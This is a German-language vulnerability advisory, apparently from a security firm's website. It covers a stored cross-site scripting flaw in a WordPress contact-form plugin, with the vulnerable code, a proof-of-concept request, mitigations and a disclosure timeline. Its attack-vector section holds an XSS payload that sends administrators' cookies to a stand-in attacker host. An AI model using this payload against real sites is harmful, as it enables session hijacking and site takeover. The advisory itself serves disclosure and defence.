Zum Inhalt springen

Services, Wiki-Artikel, Blog-Beiträge und Glossar-Einträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen
CVE-2025-43579 Hoch · CVSS 7.5 Web

Cross-Site Scripting in ContactForm Pro Plugin

Veröffentlicht:

Eine Stored Cross-Site Scripting (XSS) Schwachstelle im ContactForm Pro WordPress Plugin ermöglicht es nicht-authentifizierten Angreifern, schadhaften JavaScript-Code über manipulierte Formulareingaben in die Administrationsoberfläche einzuschleusen.

Betroffene Software

Produkt
ContactForm Pro WordPress Plugin
Betroffene Versionen
<= 4.2.1
Hersteller
FormCraft GmbH
CVSS-Vektor
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Technische Analyse

Die Schwachstelle befindet sich in der Verarbeitung von Formulareingaben im Admin-Dashboard des ContactForm Pro Plugins. Eingaben aus dem Feld message werden ohne ausreichende Sanitisierung in der Admin-Ansicht gerendert.

Betroffener Code

Der folgende Code-Abschnitt zeigt die fehlerhafte Verarbeitung:

// Verwundbarer Code (vereinfacht)
function render_submission($data) {
    // Fehlende Sanitisierung
    echo '<div class="submission-content">' . $data['message'] . '</div>';
}

Angriffsvektor

Ein Angreifer kann über das öffentlich zugängliche Kontaktformular einen Payload wie den folgenden einschleusen:

<img src=x onerror="fetch('https://attacker.example/steal?c='+document.cookie)">

Dieser Code wird ausgeführt, sobald ein Administrator die Formular-Einsendungen im WordPress-Backend betrachtet.

Auswirkung

  • Vertraulichkeit: Session-Cookies des Administrators können exfiltriert werden
  • Integrität: Über die gestohlene Admin-Session können beliebige Änderungen an der WordPress-Installation vorgenommen werden
  • Verfügbarkeit: Keine direkte Auswirkung

Proof of Concept

Nach Ablauf der Responsible-Disclosure-Frist veröffentlichen wir einen reduzierten PoC:

POST /wp-json/contactform-pro/v1/submit HTTP/1.1
Host: target.example
Content-Type: application/json

{
  "form_id": 1,
  "fields": {
    "name": "Test User",
    "email": "test@example.com",
    "message": "<svg onload=alert(document.domain)>"
  }
}

Empfohlene Maßnahmen

  1. Sofort: Update auf Version 4.2.2 durchführen
  2. Kurzfristig: Content-Security-Policy Header implementieren
  3. Langfristig: Regelmäßige Penetrationstests der WordPress-Installation durchführen

Wir testen Ihre Web-Applikationen auf genau solche Schwachstellen. Erfahren Sie mehr über unsere Penetrationstests →

Responsible Disclosure Timeline

  1. Schwachstelle entdeckt durch AWARE7 Researcher

  2. Hersteller informiert (Responsible Disclosure)

  3. Hersteller bestätigt Schwachstelle

  4. Patch veröffentlicht (Version 4.2.2)

  5. Advisory veröffentlicht

Empfohlene Gegenmaßnahmen

Update auf ContactForm Pro Version 4.2.2 oder höher. Als Workaround kann die HTML-Ausgabe in der Administrationsoberfläche temporär deaktiviert werden.

XSSWordPressPlugin

AWARE7 Leistung zum Thema

Schützen Sie Ihre Systeme proaktiv — durch professionelle Sicherheitstests erkennen wir Schwachstellen wie diese, bevor Angreifer es tun.

Web-Applikations-Penetrationstest

Verwandte AWARE7-Leistungen

Penetrationstest ISO 27001 Beratung Security Schulungen
Alle Advisories Kostenlose Erstberatung vereinbaren

Schwachstellen finden, bevor Angreifer es tun

Unsere Sicherheitsforscher decken Schwachstellen durch gezielte Penetrationstests auf — und helfen Ihnen, diese zu schließen.

Kostenlose Erstberatung vereinbaren

Kostenlos · 30 Minuten · Unverbindlich

Cookielose Analyse via Matomo (selbst gehostet, kein Tracking-Cookie). Datenschutzerklärung